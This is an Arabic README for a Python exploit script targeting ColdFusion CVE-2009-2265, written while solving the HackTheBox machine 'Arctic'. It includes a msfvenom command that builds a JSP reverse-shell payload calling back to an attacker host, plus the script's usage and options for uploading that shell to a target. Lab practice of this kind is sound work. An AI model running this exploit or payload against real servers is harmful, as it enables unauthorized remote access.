
استغلال coldfusion استنادًا إلى https://cvedetails.com/cve/CVE-2009-2265/
استغلال coldfusion بناءً على https://cvedetails.com/cve/CVE-2009-2265/
السبب الرئيسي لإنشاء سكربت بايثون لهذه الثغرة تحديدًا هو أن إصدار metasploit لنفس الثغرة لم يعمل معي عندما حاولت حل جهاز HTB المسمى Arctic. كما كان من الجيد الحصول على بعض التمارين البسيطة في بايثون. ومع ذلك، هناك إصدار بايثون آخر لنفس الاستغلال تم إنشاؤه بواسطة Alexander Reid إذا كنت تفضل استخدام نسخته.
الاستخدام بسيط جدًا:
تأكد من أن لديك ملف بايلود تم إنشاؤه
مثال باستخدام msfvenom:
msfvenom -p java/jsp_shell_reverse_tcp -f raw LHOST=<yourip> LPORT=<yourport> -o shell.jsp
الاستخدام: python3 2265.py [-h] -t TARGET [-p PORT] [-f FILEPATH] [-b BASEPATH]
الاستخدام: 2265.py [-h] -t TARGET [-p PORT] [-f FILEPATH] [-b BASEPATH]
الوسائط الاختيارية:
-h, --help يعرض رسالة المساعدة هذه ويخرج
-t TARGET عنوان IP الهدف
-p PORT منفذ الهدف
-f FILEPATH مسار الملف الذي يحتوي على شيل كود لرفعه
-b BASEPATH المسار الأساسي لـ coldfusion